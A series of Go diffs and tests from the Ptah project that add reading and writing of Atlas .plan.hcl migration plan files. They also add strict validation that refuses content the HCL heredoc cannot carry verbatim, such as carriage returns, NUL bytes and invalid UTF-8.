 		for line := range strings.Lines(text + "\n") {
-			line = strings.TrimRight(line, "\r\n")
+			// Only the line separator is removed here: a carriage return must
+			// still reach the validator, which refuses it instead of letting
+			// the writer silently rewrite CRLF content to LF.
+			line = strings.TrimSuffix(line, "\n")
 			if err := validateHCLHeredocLine(line); err != nil {
 				return nil, err
 			}
-			migration.WriteString(hclPlanBodyIndent)
-			migration.WriteString(line)
+			// Empty lines stay empty instead of becoming indentation: HCL
+			// excludes blank lines when computing how much indentation `<<-`
+			// strips, so an unindented blank line round-trips exactly while
+			// an indented one would come back as whitespace the operator
+			// never wrote.
+			if line != "" {
+				migration.WriteString(hclPlanBodyIndent)
+				migration.WriteString(line)
+			}
 			migration.WriteString("\n")
 		}
 	}
@@ -297,6 +315,9 @@ func validatePlanHCL(plan PlanFile) error {
 // names, sha256 fingerprints) is plain ASCII, so hitting this means the
 // caller passed something the Atlas plan shape cannot carry verbatim.
 func validateHCLString(field, value string) error {
+	if !utf8.ValidString(value) {
+		return fmt.Errorf("%s is not valid UTF-8 and cannot be written into an Atlas .plan.hcl document", field)
+	}
 	if strings.ContainsAny(value, "\"\\\n\r\t") || strings.Contains(value, "${") || strings.Contains(value, "%{") {
 		return fmt.Errorf("%s %q contains characters that cannot be written verbatim into an Atlas .plan.hcl quoted string", field, value)
 	}
@@ -304,14 +325,35 @@ func validateHCLString(field, value string) error {
 }
 
 // validateHCLHeredocLine rejects migration content that the `<<-SQL` heredoc
-// cannot carry verbatim: a line consisting of the heredoc delimiter would
-// terminate the document early, and HCL template interpolation sequences
-// would be evaluated instead of read back as SQL.
+// cannot carry verbatim. The writer's contract is that unrepresentable
+// content is refused, never silently rewritten: a line consisting of the
+// heredoc delimiter would terminate the document early, HCL template
+// interpolation sequences would be evaluated instead of read back as SQL, a
+// carriage return would not survive the line-by-line re-indentation, and
+// invalid UTF-8 produces a file neither parser can read.
 func validateHCLHeredocLine(line string) error {
+	if !utf8.ValidString(line) {
+		return errors.New(
+			"plan migration contains invalid UTF-8 and cannot be written as an Atlas .plan.hcl document; " +
+				"write the native JSON plan format instead")
+	}
 	if strings.TrimSpace(line) == hclPlanHeredocDelimiter {
 		return fmt.Errorf(
 			"plan migration contains a line consisting of the heredoc delimiter %q and cannot be written as an Atlas .plan.hcl document; "+
 				"write the native JSON plan format instead", hclPlanHeredocDelimiter)
+	}
+	if strings.Contains(line, "\r") {
+		return errors.New(
+			"plan migration contains a carriage return, which an Atlas .plan.hcl heredoc cannot carry back verbatim; " +
+				"normalize the statement to LF line endings or write the native JSON plan format instead")
+	}
+	// HCL excludes whitespace-only lines from `<<-` indent stripping and
+	// leaves them untouched, so the two spaces the writer adds would come
+	// back as part of the statement.
+	if line != "" && strings.TrimSpace(line) == "" {
+		return errors.New(
+			"plan migration contains a whitespace-only line, which an Atlas .plan.hcl heredoc cannot carry back " +
+				"verbatim; leave the line empty or write the native JSON plan format instead")
 	}
 	if strings.Contains(line, "${") || strings.Contains(line, "%{") {
 		return errors.New(

--- a/internal/atlasschema/planfile_hcl.go
+++ b/internal/atlasschema/planfile_hcl.go
@@ -347,6 +347,14 @@ func validateHCLHeredocLine(line string) error {
 			"plan migration contains a carriage return, which an Atlas .plan.hcl heredoc cannot carry back verbatim; " +
 				"normalize the statement to LF line endings or write the native JSON plan format instead")
 	}
+	// A NUL byte is valid UTF-8 but truncates the heredoc line on the way
+	// back in, so a write/read round trip would yield different, still
+	// parseable SQL with no error at all.
+	if strings.ContainsRune(line, 0) {
+		return errors.New(
+			"plan migration contains a NUL byte, which an Atlas .plan.hcl heredoc cannot carry back verbatim; " +
+				"remove it or write the native JSON plan format instead")
+	}
 	// HCL excludes whitespace-only lines from `<<-` indent stripping and
 	// leaves them untouched, so the two spaces the writer adds would come
 	// back as part of the statement.

--- a/internal/atlasschema/planfile_hcl.go
+++ b/internal/atlasschema/planfile_hcl.go
@@ -1,0 +1,326 @@
+package atlasschema
+
+import (
+	"errors"
+	"fmt"
+	"maps"
+	"os"
+	"slices"
+	"strings"
+	"time"
+
+	"github.com/hashicorp/hcl/v2"
+	"github.com/hashicorp/hcl/v2/hclsyntax"
+	digest "github.com/opencontainers/go-digest"
+	"github.com/zclconf/go-cty/cty"
+
+	"github.com/stokaro/ptah/core/sqlutil"
+	"github.com/stokaro/ptah/migration/safety"
+)
+
+// PlanFormat identifies the on-disk encoding of a local plan file.
+type PlanFormat string
+
+const (
+	// PlanFormatJSON is Ptah's native plan-file encoding: the format_version-1
+	// JSON document with sha256 fingerprints, dialect, exclude patterns, and
+	// per-statement safety classification.
+	PlanFormatJSON PlanFormat = "json"
+
+	// PlanFormatHCL is the Atlas `.plan.hcl` encoding measured from the
+	// official binary: one `plan "<name>"` block with `from`, `to`, and
+	// `migration` attributes. It carries no dialect, exclude patterns, or
+	// per-statement metadata; Ptah re-derives those at read time.
+	PlanFormatHCL PlanFormat = "hcl"
+)
+
+// PlanFileSuffixHCL is the Atlas plan-file name suffix. The Atlas-compatible
+// command tree saves and defaults to this format; the JSON format stays the
+// native `ptah` plan-file contract.
+const PlanFileSuffixHCL = ".plan.hcl"
+
+// hclPlanHeredocDelimiter is the heredoc delimiter Atlas uses for the
+// migration attribute; Ptah mirrors it byte-for-byte.
+const hclPlanHeredocDelimiter = "SQL"
+
+// hclPlanBodyIndent is the two-space indentation of the plan block body and
+// the `<<-SQL` heredoc content in Atlas-written plan files.
+const hclPlanBodyIndent = "  "
+
+// DetectPlanFormat classifies plan-file contents. A JSON document starts with
+// '{' (after leading whitespace); everything else is treated as the Atlas HCL
+// plan format, whose top level is always a `plan` block.
+func DetectPlanFormat(contents []byte) PlanFormat {
+	for _, b := range contents {
+		switch b {
+		case ' ', '\t', '\r', '\n':
+			continue
+		case '{':
+			return PlanFormatJSON
+		default:
+			return PlanFormatHCL
+		}
+	}
+	return PlanFormatHCL
+}
+
+// ReadPlanDocument loads and validates a local plan file in either supported
+// encoding, reporting which format it was. The Atlas-compatible apply path
+// uses it so Atlas-authored `.plan.hcl` files and Ptah's native `.plan.json`
+// files are both readable; the native command tree keeps [ReadPlanFile].
+func ReadPlanDocument(path string) (PlanFile, PlanFormat, error) {
+	contents, err := os.ReadFile(path)
+	if err != nil {
+		return PlanFile{}, "", fmt.Errorf("read plan file: %w", err)
+	}
+	format := DetectPlanFormat(contents)
+	switch format {
+	case PlanFormatJSON:
+		plan, err := decodePlanJSON(contents, path)
+		return plan, format, err
+	default:
+		plan, err := decodePlanHCL(contents, path)
+		return plan, format, err
+	}
+}
+
+// IsNativeFingerprint reports whether fingerprint is a Ptah-computed schema
+// fingerprint (`sha256:<hex>`, see [SchemaFingerprint]) that apply-time
+// verification can recompute. Atlas plan files carry base64 hashes with no
+// algorithm prefix; those are foreign — Ptah has no local recipe for them and
+// verifies such plans semantically against the --to desired state instead.
+func IsNativeFingerprint(fingerprint string) bool {
+	parsed, err := digest.Parse(fingerprint)
+	return err == nil && parsed.Algorithm() == digest.SHA256
+}
+
+// TimestampPlanName returns the Atlas-style timestamp plan name
+// (YYYYMMDDHHMMSS in UTC) used as the default name for `.plan.hcl` plans,
+// mirroring the names the official binary writes.
+func TimestampPlanName(now time.Time) string {
+	return now.UTC().Format("20060102150405")
+}
+
+// decodePlanHCL parses an Atlas-format plan document into the plan structure.
+// The parser is strict, mirroring the JSON reader's DisallowUnknownFields:
+// exactly one `plan` block with one label, exactly the `from`, `to`, and
+// `migration` attributes, nothing else. Per-statement severity, the
+// plan-level destructive marker, and the statement list are re-derived from
+// the migration SQL, because the Atlas format does not record them; the
+// dialect and format_version fields stay empty for the same reason.
+func decodePlanHCL(contents []byte, path string) (PlanFile, error) {
+	file, diags := hclsyntax.ParseConfig(contents, path, hcl.Pos{Line: 1, Column: 1})
+	if diags.HasErrors() {
+		return PlanFile{}, fmt.Errorf("parse plan file %s: %s", path, diags.Error())
+	}
+	body, ok := file.Body.(*hclsyntax.Body)
+	if !ok {
+		return PlanFile{}, fmt.Errorf("parse plan file %s: unexpected HCL body type %T", path, file.Body)
+	}
+	block, err := singlePlanBlock(body)
+	if err != nil {
+		return PlanFile{}, fmt.Errorf("invalid plan file %s: %w", path, err)
+	}
+
+	attributes, err := planBlockAttributes(block.Body)
+	if err != nil {
+		return PlanFile{}, fmt.Errorf("invalid plan file %s: %w", path, err)
+	}
+	plan := PlanFile{
+		Name:            block.Labels[0],
+		FromFingerprint: attributes["from"],
+		ToFingerprint:   attributes["to"],
+		Statements:      planStatementsFromSQL(sqlutil.SplitSQLStatements(attributes["migration"])),
+	}
+	for _, statement := range plan.Statements {
+		plan.Destructive = plan.Destructive || statement.Severity == safety.Destructive
+	}
+	if err := validatePlanHCL(plan); err != nil {
+		return PlanFile{}, fmt.Errorf("invalid plan file %s: %w", path, err)
+	}
+	return plan, nil
+}
+
+// MarshalPlanFileHCL renders the plan in the Atlas `.plan.hcl` shape measured
+// from the official binary: one `plan "<name>"` block with aligned `from`,
+// `to`, and `migration` attributes and a `<<-SQL` heredoc holding the ordered
+// statements. The from/to values are Ptah's own sha256 fingerprints — the
+// file parses in Atlas's reader, but the official binary verifies its own
+// base64 hashes, which Ptah cannot compute locally. The output is
+// deterministic for identical plan contents.
+func MarshalPlanFileHCL(plan PlanFile) ([]byte, error) {
+	if len(plan.Exclude) > 0 {
+		return nil, errors.New(
+			"the Atlas .plan.hcl format has no field for exclude patterns, so a plan computed with --exclude " +
+				"cannot be represented faithfully; write the native JSON plan format (--output <name>" + PlanFileSuffix + ") " +
+				"or drop --exclude")
+	}
+	if err := validateHCLString("plan name", plan.Name); err != nil {
+		return nil, err
+	}
+	if err := validateHCLString("plan from fingerprint", plan.FromFingerprint); err != nil {
+		return nil, err
+	}
+	if err := validateHCLString("plan to fingerprint", plan.ToFingerprint); err != nil {
+		return nil, err
+	}
+	if err := validatePlanHCL(plan); err != nil {
+		return nil, fmt.Errorf("render HCL plan file: %w", err)
+	}
+
+	var migration strings.Builder
+	for _, statement := range plan.Statements {
+		text := strings.TrimSuffix(strings.TrimSpace(statement.SQL), ";") + ";"
+		for line := range strings.Lines(text + "\n") {
+			line = strings.TrimRight(line, "\r\n")
+			if err := validateHCLHeredocLine(line); err != nil {
+				return nil, err
+			}
+			migration.WriteString(hclPlanBodyIndent)
+			migration.WriteString(line)
+			migration.WriteString("\n")
+		}
+	}
+
+	var out strings.Builder
+	fmt.Fprintf(&out, "plan %q {\n", plan.Name)
+	fmt.Fprintf(&out, "%sfrom      = %q\n", hclPlanBodyIndent, plan.FromFingerprint)
+	fmt.Fprintf(&out, "%sto        = %q\n", hclPlanBodyIndent, plan.ToFingerprint)
+	fmt.Fprintf(&out, "%smigration = <<-%s\n", hclPlanBodyIndent, hclPlanHeredocDelimiter)
+	out.WriteString(migration.String())
+	fmt.Fprintf(&out, "%s%s\n}\n", hclPlanBodyIndent, hclPlanHeredocDelimiter)
+	return []byte(out.String()), nil
+}
+
+// PlanFileSuffixFor returns the conventional plan-file suffix for format.
+func PlanFileSuffixFor(format PlanFormat) string {
+	if format == PlanFormatHCL {
+		return PlanFileSuffixHCL
+	}
+	return PlanFileSuffix
+}
+
+// MarshalPlanFileAs renders the plan document in the requested format.
+func MarshalPlanFileAs(plan PlanFile, format PlanFormat) ([]byte, error) {
+	if format == PlanFormatHCL {
+		return MarshalPlanFileHCL(plan)
+	}
+	return MarshalPlanFile(plan)
+}
+
+// planStatementsFromSQL classifies raw migration statements exactly like
+// [PreparePlanFile] classifies freshly planned ones, so a plan read from the
+// Atlas format carries the same per-statement safety metadata a native plan
+// records at planning time.
+func planStatementsFromSQL(raw []string) []PlanStatement {
+	statements := make([]PlanStatement, 0, len(raw))
+	for _, statement := range raw {
+		assessment := safety.AssessSQL(strings.TrimSpace(sqlutil.StripComments(statement)))
+		statements = append(statements, PlanStatement{
+			SQL:      statement,
+			Severity: assessment.Severity,
+			Reason:   assessment.Reason,
+		})
+	}
+	return statements
+}
+
+func singlePlanBlock(body *hclsyntax.Body) (*hclsyntax.Block, error) {
+	if len(body.Attributes) > 0 {
+		return nil, fmt.Errorf("unexpected top-level attribute %q; an Atlas plan file contains exactly one plan block", firstAttributeName(body.Attributes))
+	}
+	if len(body.Blocks) != 1 {
+		return nil, fmt.Errorf("expected exactly one plan block, found %d blocks", len(body.Blocks))
+	}
+	block := body.Blocks[0]
+	if block.Type != "plan" {
+		return nil, fmt.Errorf("unexpected block %q; an Atlas plan file contains exactly one plan block", block.Type)
+	}
+	if len(block.Labels) != 1 {
+		return nil, fmt.Errorf("plan block requires exactly one name label, found %d", len(block.Labels))
+	}
+	return block, nil
+}
+
+func planBlockAttributes(body *hclsyntax.Body) (map[string]string, error) {
+	if len(body.Blocks) > 0 {
+		return nil, fmt.Errorf("unexpected nested %q block inside the plan block", body.Blocks[0].Type)
+	}
+	required := []string{"from", "to", "migration"}
+	for _, name := range slices.Sorted(maps.Keys(body.Attributes)) {
+		if !slices.Contains(required, name) {
+			return nil, fmt.Errorf("unknown plan attribute %q", name)
+		}
+	}
+	attributes := make(map[string]string, len(required))
+	for name, attribute := range body.Attributes {
+		value, diags := attribute.Expr.Value(nil)
+		if diags.HasErrors() {
+			return nil, fmt.Errorf("evaluate plan attribute %q: %s", name, diags.Error())
+		}
+		if value.Type() != cty.String {
+			return nil, fmt.Errorf("plan attribute %q must be a string", name)
+		}
+		attributes[name] = value.AsString()
+	}
+	for _, name := range required {
+		if _, ok := attributes[name]; !ok {
+			return nil, fmt.Errorf("plan attribute %q is required", name)
+		}
+	}
+	return attributes, nil
+}
+
+func validatePlanHCL(plan PlanFile) error {
+	if strings.TrimSpace(plan.Name) == "" {
+		return errors.New("plan name is required")
+	}
+	if strings.TrimSpace(plan.FromFingerprint) == "" {
+		return errors.New("plan from fingerprint is required")
+	}
+	if strings.TrimSpace(plan.ToFingerprint) == "" {
+		return errors.New("plan to fingerprint is required")
+	}
+	if len(plan.Statements) == 0 {
+		return errors.New("plan migration contains no statements")
+	}
+	for i, statement := range plan.Statements {
+		if strings.TrimSpace(statement.SQL) == "" {
+			return fmt.Errorf("plan statement %d has empty sql", i+1)
+		}
+	}
+	return nil
+}
+
+// validateHCLString rejects values that would need escaping inside a quoted
+// HCL string. Every value Ptah writes (timestamp or fingerprint-derived
+// names, sha256 fingerprints) is plain ASCII, so hitting this means the
+// caller passed something the Atlas plan shape cannot carry verbatim.
+func validateHCLString(field, value string) error {
+	if strings.ContainsAny(value, "\"\\\n\r\t") || strings.Contains(value, "${") || strings.Contains(value, "%{") {
+		return fmt.Errorf("%s %q contains characters that cannot be written verbatim into an Atlas .plan.hcl quoted string", field, value)
+	}
+	return nil
+}
+
+// validateHCLHeredocLine rejects migration content that the `<<-SQL` heredoc
+// cannot carry verbatim: a line consisting of the heredoc delimiter would
+// terminate the document early, and HCL template interpolation sequences
+// would be evaluated instead of read back as SQL.
+func validateHCLHeredocLine(line string) error {
+	if strings.TrimSpace(line) == hclPlanHeredocDelimiter {
+		return fmt.Errorf(
+			"plan migration contains a line consisting of the heredoc delimiter %q and cannot be written as an Atlas .plan.hcl document; "+
+				"write the native JSON plan format instead", hclPlanHeredocDelimiter)
+	}
+	if strings.Contains(line, "${") || strings.Contains(line, "%{") {
+		return errors.New(
+			"plan migration contains an HCL template interpolation sequence (${ or %{) and cannot be written verbatim into an Atlas .plan.hcl heredoc; " +
+				"write the native JSON plan format instead")
+	}
+	return nil
+}
+
+func firstAttributeName(attributes hclsyntax.Attributes) string {
+	return slices.Min(slices.Collect(maps.Keys(attributes)))
+}

--- a/internal/atlasschema/planfile_hcl.go
+++ b/internal/atlasschema/planfile_hcl.go
@@ -116,6 +116,16 @@ func TimestampPlanName(now time.Time) string {
 // plan-level destructive marker, and the statement list are re-derived from
 // the migration SQL, because the Atlas format does not record them; the
 // dialect and format_version fields stay empty for the same reason.
+//
+// The derived severity and Destructive values are ADVISORY, not authoritative.
+// The Atlas format records no dialect, and reading happens before any database
+// connection exists, so the split here is dialect-blind and can differ — in
+// statement count, for MySQL-family backslash SQL — from the dialect-aware
+// split the apply path executes. Nothing on the compat apply path consumes
+// them, deliberately. Any future gate that acts on severity (an approval
+// prompt, a destructive-change refusal) must recompute it from the
+// dialect-aware statement list that [ApplyStatements] runs, never from these
+// fields.
 func decodePlanHCL(contents []byte, path string) (PlanFile, error) {
 	file, diags := hclsyntax.ParseConfig(contents, path, hcl.Pos{Line: 1, Column: 1})
 	if diags.HasErrors() {

--- a/internal/atlasschema/planfile_hcl_test.go
+++ b/internal/atlasschema/planfile_hcl_test.go
@@ -374,6 +374,14 @@ func TestMarshalPlanFileHCLRefusesUnrepresentableMigrationContent(t *testing.T) 
 			sql:  "CREATE TABLE t (\n  \n  id integer\n)",
 			want: `plan migration contains a whitespace-only line.*leave the line empty or write the native JSON plan format instead`,
 		},
+		{
+			// A NUL byte is valid UTF-8, but the HCL reader truncates the
+			// heredoc line at it, so a write/read round trip would silently
+			// yield different — still parseable — SQL.
+			name: "nul_byte",
+			sql:  "CREATE TABLE t (name text DEFAULT 'a\x00b')",
+			want: `plan migration contains a NUL byte.*remove it or write the native JSON plan format instead`,
+		},
 	}
 
 	for _, tt := range tests {

--- a/internal/atlasschema/planfile_hcl_test.go
+++ b/internal/atlasschema/planfile_hcl_test.go
@@ -1,0 +1,371 @@
+package atlasschema_test
+
+import (
+	"os"
+	"path/filepath"
+	"regexp"
+	"strings"
+	"testing"
+	"time"
+
+	qt "github.com/frankban/quicktest"
+
+	"github.com/stokaro/ptah/internal/atlasschema"
+	"github.com/stokaro/ptah/migration/safety"
+)
+
+// oraclePlanPath is the real `.plan.hcl` produced by the licensed Atlas
+// binary (v1.2.4-e282f76-canary) for the schema-plan-file measurement
+// scenario; it is the format oracle for the reader.
+const oraclePlanPath = "testdata/atlas.plan.hcl"
+
+// writtenGoldenPlanPath is the byte-exact document MarshalPlanFileHCL must
+// produce for the measured scenario's native plan contents. It mirrors the
+// mechanical Ptah-to-Atlas conversion validated against the official
+// binary's parser during the measurement campaign.
+const writtenGoldenPlanPath = "testdata/ptah-written-golden.plan.hcl"
+
+// goldenPlan is the native plan for the measured scenario (the contents of
+// the campaign's p.plan.json), used to exercise the HCL writer.
+func goldenPlan() atlasschema.PlanFile {
+	return atlasschema.PlanFile{
+		FormatVersion:   atlasschema.PlanFormatVersion,
+		Name:            "plan_6d78a9ec5390",
+		Dialect:         "sqlite",
+		FromFingerprint: "sha256:2ef81def17f625ec4fc7927e136e516022e244ab587bb702b5b71d38b05cbe27",
+		ToFingerprint:   "sha256:c4fc6302f3cc08997acbb8b8d6ae52eabcbd9c6604a9835305035b1522e03b23",
+		Statements: []atlasschema.PlanStatement{
+			{
+				SQL: "CREATE TABLE \"posts\" (\n  \"id\" integer PRIMARY KEY AUTOINCREMENT,\n  \"user_id\" integer NOT NULL,\n" +
+					"  \"title\" TEXT NOT NULL,\n  CONSTRAINT \"fk_posts_user\" FOREIGN KEY (\"user_id\") REFERENCES \"users\" (\"id\")\n)",
+				Severity: safety.Safe,
+				Reason:   "does not remove data or tighten constraints",
+			},
+			{
+				SQL:      `ALTER TABLE "users" ADD COLUMN "email" TEXT`,
+				Severity: safety.Safe,
+				Reason:   "does not remove data or tighten constraints",
+			},
+			{
+				SQL:      `CREATE INDEX IF NOT EXISTS "idx_posts_user_id" ON "posts" ("user_id")`,
+				Severity: safety.Safe,
+				Reason:   "does not remove data or tighten constraints",
+			},
+		},
+	}
+}
+
+func TestReadPlanDocumentParsesOracleAtlasPlan(t *testing.T) {
+	c := qt.New(t)
+
+	plan, format, err := atlasschema.ReadPlanDocument(oraclePlanPath)
+
+	// Every field of the real Atlas-authored plan file lands in the plan
+	// structure: the timestamp name, both base64 hashes verbatim, and the
+	// three migration statements in file order with their comment lines.
+	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+	c.Assert(plan.Name, qt.Equals, "20260801102801")
+	c.Assert(plan.FromFingerprint, qt.Equals, "2Avyplv6jw8kAsH/g2YFPkfnp+UNBpomMXPUl/4R4+Q=")
+	c.Assert(plan.ToFingerprint, qt.Equals, "YEugbm2aJqmXFA8dDrzmqLPC4tiNUrXe6YCrvazKOiY=")
+	// The Atlas format records neither a format version, a dialect, nor
+	// exclude patterns; those stay zero-valued.
+	c.Assert(plan.FormatVersion, qt.Equals, 0)
+	c.Assert(plan.Dialect, qt.Equals, "")
+	c.Assert(plan.Exclude, qt.IsNil)
+	c.Assert(plan.Destructive, qt.IsFalse)
+	c.Assert(plan.Statements, qt.HasLen, 3)
+	c.Assert(plan.Statements[0].SQL, qt.Equals,
+		"-- Add column \"email\" to table: \"users\"\nALTER TABLE `users` ADD COLUMN `email` text NULL")
+	c.Assert(plan.Statements[1].SQL, qt.Equals,
+		"-- Create \"posts\" table\nCREATE TABLE `posts` (\n  `id` integer NOT NULL PRIMARY KEY AUTOINCREMENT,\n"+
+			"  `user_id` integer NOT NULL,\n  `title` text NOT NULL,\n"+
+			"  CONSTRAINT `fk_posts_user` FOREIGN KEY (`user_id`) REFERENCES `users` (`id`) ON UPDATE NO ACTION ON DELETE NO ACTION\n)")
+	c.Assert(plan.Statements[2].SQL, qt.Equals,
+		"-- Create index \"idx_posts_user_id\" to table: \"posts\"\nCREATE INDEX `idx_posts_user_id` ON `posts` (`user_id`)")
+	for i, statement := range plan.Statements {
+		c.Assert(statement.Severity, qt.Equals, safety.Safe, qt.Commentf("statement %d", i+1))
+		c.Assert(statement.Reason, qt.Not(qt.Equals), "", qt.Commentf("statement %d", i+1))
+	}
+	// The Atlas hashes are foreign: base64 without an algorithm prefix, so
+	// apply-time verification cannot recompute them.
+	c.Assert(atlasschema.IsNativeFingerprint(plan.FromFingerprint), qt.IsFalse)
+	c.Assert(atlasschema.IsNativeFingerprint(plan.ToFingerprint), qt.IsFalse)
+}
+
+func TestReadPlanDocumentReadsNativeJSONPlan(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	path := filepath.Join(dir, "native.plan.json")
+	document, err := atlasschema.MarshalPlanFile(goldenPlan())
+	c.Assert(err, qt.IsNil)
+	c.Assert(os.WriteFile(path, document, 0o600), qt.IsNil)
+
+	plan, format, err := atlasschema.ReadPlanDocument(path)
+
+	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatJSON)
+	c.Assert(plan, qt.DeepEquals, goldenPlan())
+	c.Assert(atlasschema.IsNativeFingerprint(plan.FromFingerprint), qt.IsTrue)
+}
+
+func TestDetectPlanFormat(t *testing.T) {
+	tests := []struct {
+		name     string
+		contents string
+		want     atlasschema.PlanFormat
+	}{
+		{name: "json_document", contents: `{"format_version":1}`, want: atlasschema.PlanFormatJSON},
+		{name: "json_with_leading_whitespace", contents: "\n\t {\"format_version\":1}", want: atlasschema.PlanFormatJSON},
+		{name: "hcl_plan_block", contents: "plan \"x\" {\n}\n", want: atlasschema.PlanFormatHCL},
+		{name: "hcl_with_leading_whitespace", contents: "\n  plan \"x\" {}", want: atlasschema.PlanFormatHCL},
+		{name: "empty_defaults_to_hcl", contents: "", want: atlasschema.PlanFormatHCL},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+
+			c.Assert(atlasschema.DetectPlanFormat([]byte(tt.contents)), qt.Equals, tt.want)
+		})
+	}
+}
+
+func TestMarshalPlanFileHCLMatchesGolden(t *testing.T) {
+	c := qt.New(t)
+
+	document, err := atlasschema.MarshalPlanFileHCL(goldenPlan())
+
+	// The written document is byte-identical to the golden fixture, whose
+	// shape the official Atlas binary parsed during the measurement campaign
+	// (it aborted only at hash verification, which has no local recipe).
+	c.Assert(err, qt.IsNil)
+	golden, readErr := os.ReadFile(writtenGoldenPlanPath)
+	c.Assert(readErr, qt.IsNil)
+	c.Assert(string(document), qt.Equals, string(golden))
+}
+
+func TestMarshalPlanFileHCLMatchesOracleShape(t *testing.T) {
+	c := qt.New(t)
+
+	document, err := atlasschema.MarshalPlanFileHCL(goldenPlan())
+	c.Assert(err, qt.IsNil)
+
+	// Line-shape comparison against the real Atlas-authored plan file: same
+	// block header, same aligned attributes, same heredoc opening and
+	// closing. Only the values and the SQL body differ.
+	oracle, readErr := os.ReadFile(oraclePlanPath)
+	c.Assert(readErr, qt.IsNil)
+	c.Assert(planDocumentShape(c, string(document)), qt.DeepEquals, planDocumentShape(c, string(oracle)))
+}
+
+// planDocumentShape reduces a plan document to its structural skeleton:
+// quoted values become "V" and heredoc body lines collapse away, leaving
+// exactly the lines whose shape the Atlas format fixes.
+func planDocumentShape(c *qt.C, document string) []string {
+	c.Helper()
+	value := regexp.MustCompile(`"[^"]*"`)
+	var shape []string
+	inHeredoc := false
+	for line := range strings.Lines(document) {
+		line = strings.TrimRight(line, "\n")
+		switch {
+		case strings.HasSuffix(line, "<<-SQL"):
+			inHeredoc = true
+			shape = append(shape, value.ReplaceAllString(line, `"V"`))
+		case inHeredoc && line == "  SQL":
+			inHeredoc = false
+			shape = append(shape, line)
+		case inHeredoc:
+			// SQL content is scenario-specific, not format shape.
+		default:
+			shape = append(shape, value.ReplaceAllString(line, `"V"`))
+		}
+	}
+	return shape
+}
+
+func TestMarshalPlanFileHCLRoundTrips(t *testing.T) {
+	c := qt.New(t)
+	dir := t.TempDir()
+	path := filepath.Join(dir, "roundtrip.plan.hcl")
+	document, err := atlasschema.MarshalPlanFileHCL(goldenPlan())
+	c.Assert(err, qt.IsNil)
+	c.Assert(os.WriteFile(path, document, 0o600), qt.IsNil)
+
+	plan, format, err := atlasschema.ReadPlanDocument(path)
+
+	// Reading back what the writer produced preserves the name, both
+	// fingerprints, and every statement with its re-derived safety
+	// classification. The dialect and format version are not representable
+	// in the Atlas shape, so they come back zero-valued.
+	c.Assert(err, qt.IsNil)
+	c.Assert(format, qt.Equals, atlasschema.PlanFormatHCL)
+	c.Assert(plan.Name, qt.Equals, goldenPlan().Name)
+	c.Assert(plan.FromFingerprint, qt.Equals, goldenPlan().FromFingerprint)
+	c.Assert(plan.ToFingerprint, qt.Equals, goldenPlan().ToFingerprint)
+	c.Assert(plan.Statements, qt.DeepEquals, goldenPlan().Statements)
+	c.Assert(plan.Destructive, qt.IsFalse)
+	c.Assert(atlasschema.IsNativeFingerprint(plan.FromFingerprint), qt.IsTrue)
+	c.Assert(atlasschema.IsNativeFingerprint(plan.ToFingerprint), qt.IsTrue)
+}
+
+func TestMarshalPlanFileHCLRefusesUnrepresentablePlans(t *testing.T) {
+	tests := []struct {
+		name   string
+		mutate func(*atlasschema.PlanFile)
+		want   string
+	}{
+		{
+			name:   "exclude_patterns",
+			mutate: func(plan *atlasschema.PlanFile) { plan.Exclude = []string{"users"} },
+			want:   `the Atlas \.plan\.hcl format has no field for exclude patterns.*write the native JSON plan format.*or drop --exclude`,
+		},
+		{
+			name: "heredoc_delimiter_line",
+			mutate: func(plan *atlasschema.PlanFile) {
+				plan.Statements[0].SQL = "CREATE TABLE x (\nSQL\n)"
+			},
+			want: `plan migration contains a line consisting of the heredoc delimiter "SQL".*`,
+		},
+		{
+			name: "template_interpolation",
+			mutate: func(plan *atlasschema.PlanFile) {
+				plan.Statements[0].SQL = `INSERT INTO x VALUES ('${oops}')`
+			},
+			want: `plan migration contains an HCL template interpolation sequence.*`,
+		},
+		{
+			name:   "name_needs_escaping",
+			mutate: func(plan *atlasschema.PlanFile) { plan.Name = `a"b` },
+			want:   `plan name .* contains characters that cannot be written verbatim.*`,
+		},
+	}
+
+	for _, tt := range tests {
+		t.Run(tt.name, func(t *testing.T) {
+			c := qt.New(t)
+			plan := goldenPlan()
+			tt.mutate(&plan)
+
+			_, err := atlasschema.MarshalPlanFileHCL(plan)
+
+			c.Assert(err, qt.ErrorMatches, tt.want)
+		})
+	}
+}
+
+func TestReadPlanDocumentRejectsMalformedHCL(t *testing.T) {
+	tests := []struct {
+		name     string
+		contents string
+		want     string
+	}{
+		{
+			name:     "not_hcl",
+			contents: "this is not a plan",
+			want:     `parse plan file .*`,
+		},
+		{
+			name:     "no_plan_block",
+			contents: "env \"x\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c\"\n}\n",
+			want:     `invalid plan file .*: unexpected block "env"; an Atlas plan file contains exactly one plan block`,
+		},
+		{
+			name:     "two_plan_blocks",
+			contents: "plan \"a\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n}\nplan \"b\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `invalid plan file .*: expected exactly one plan block, found 2 blocks`,
+		},
+		{
+			name:     "missing_label",
+			contents: "plan {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `invalid plan file .*: plan block requires exactly one name label, found 0`,
+		},
+		{
+			name:     "missing_migration",
+			contents: "plan \"a\" {\n  from = \"a\"\n  to = \"b\"\n}\n",
+			want:     `invalid plan file .*: plan attribute "migration" is required`,
+		},
+		{
+			name:     "unknown_attribute",
+			contents: "plan \"a\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n  surprise = true\n}\n",
+			want:     `invalid plan file .*: unknown plan attribute "surprise"`,
+		},
+		{
+			name:     "non_string_attribute",
+			contents: "plan \"a\" {\n  from = 1\n  to = \"b\"\n  migration = \"c;\"\n}\n",
+			want:     `invalid plan file .*: plan attribute "from" must be a string`,
+		},
+		{
+			name:     "nested_block",
+			contents: "plan \"a\" {\n  from = \"a\"\n  to = \"b\"\n  migration = \"c;\"\n  lint {\n  }\n}\n",
+			want:     `invalid plan file .*: unexpected nested "lint" block inside the plan block`,
+		},
+		{
+			name:     "top_level_attribute",
